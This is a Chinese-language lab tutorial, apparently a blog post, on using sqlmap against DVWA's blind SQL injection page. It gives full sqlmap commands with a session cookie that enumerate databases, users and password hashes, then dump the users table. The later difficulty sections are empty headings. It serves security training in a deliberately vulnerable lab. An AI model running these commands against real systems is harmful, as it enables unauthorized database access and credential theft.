用sqlmap实现dvwa中的盲注详解
一、 dvwa 低sql盲注
① 启动Burpsuite,在SQL injection(Blind)中输入如下,然后查看Burpsuite中抓到的URL和Cookie。
② 启动sqlmap,在上图中复制URL和cookie,在sqlmap中输入:sqlmap –u ‘复制的URL’ --cookie=’复制的cookie’ ,可以查看数据库类型。
PHPSESSID=jmrh7e40u41fjch3g2ht57dv00 Cookie: security=low
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” –batch
③获得DBMS中所有的数据库名称
构造指令:
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch –dbs
④获取Web应用当前连接的数据库
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch --current-db
⑥ 列出数据库中的所有用户
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch –users
⑦ 获取Web应用当前所操作的用户
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch --current-user
⑧ 列出可连接数据库的所有账户-对应的密码哈希
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch --passwords
⑨ 列出指定数据库中的所有数据表
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch -D dvwa –tables
⑩ 列出指定数据表中的所有字段(列)
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch -D dvwa -T users --columns
⑪ 导出指定数据表中的列字段进行保存
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch -D dvwa -T users -C “user,password” –dump
二、 dvwa 中sql盲注
三、 dvwa 高sql盲注
四、 dvwa impossible sql盲注
(dvwa用sqlmap盲注完毕!!!)
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗